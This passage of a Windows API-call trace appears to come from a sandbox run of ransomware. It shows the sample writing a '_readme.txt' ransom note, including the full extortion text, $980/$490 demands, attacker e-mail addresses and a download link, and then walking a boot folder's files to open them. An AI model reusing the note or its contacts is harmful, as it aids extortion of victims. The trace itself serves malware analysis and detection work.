(hModule=0x759a0000, lpProcName="SHGetFolderPathW") returned 0x75a25708 [0183.490] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2ade6e0 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0183.491] FreeLibrary (hLibModule=0x759a0000) returned 1 [0183.491] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.491] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.491] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.491] PathAppendW (in: pszPath="C:\\Boot\\el-GR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\el-GR\\_readme.txt") returned 1 [0183.491] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.491] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.491] PathFileExistsW (pszPath="C:\\Boot\\el-GR\\_readme.txt") returned 0 [0183.492] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x2ae3ea0 [0183.492] lstrcpyW (in: lpString1=0x2ae3ea0, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0183.492] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0183.492] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac5768 [0183.492] CreateFileW (lpFileName="C:\\Boot\\el-GR\\_readme.txt" (normalized: "c:\\boot\\el-gr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0183.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac5768 | out: hHeap=0x2c0000) returned 1 [0183.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae3ea0 | out: hHeap=0x2c0000) returned 1 [0183.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.493] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.493] FindFirstFileW (in: lpFileName="C:\\Boot\\el-GR\\*" (normalized: "c:\\boot\\el-gr\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d5e380, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0183.494] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.494] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d5e380, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0183.494] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0183.494] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.494] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0183.494] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.494] PathFindExtensionW (pszPath="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned=".mui" [0183.495] CreateFileW (lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0183.496] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0183.496] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0183.497] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0183.497] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.498] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0183.498] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0183.498] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0183.498] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0183.498] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.498] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.498] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.499] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.499] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.499] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.499] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.499] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.499] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.499] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.500] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.500] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.500] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.500] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.500] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.501] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.501] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.501] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.501] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.501] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.501] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.501] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0183.502] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.502] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.502] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.502] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.502] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0183.502] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.503] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.503] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.503] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.503] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.503] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.504] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.504] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.504] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0183.504] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.504] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.504] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0183.505] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.505] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0183.505] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.506] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.506] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.506] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.506] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.507] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.507] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0183.508] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.508] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.508] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.508] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0183.509] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.509] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.510] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.510] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.511] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.511] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.513] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.513] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.514] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.514] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.514] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.514] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.514] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0183.515] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.515] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.516] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.516] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.516] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.516] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.517] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0183.517] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.518] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.518] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0183.519] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.519] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.519] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.519] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0183.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.520] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.520] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.521] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.521] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.522] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.522] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.522] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.522] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0183.522] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.522] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.523] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0183.523] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.524] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.524] RtlAllocateHeap 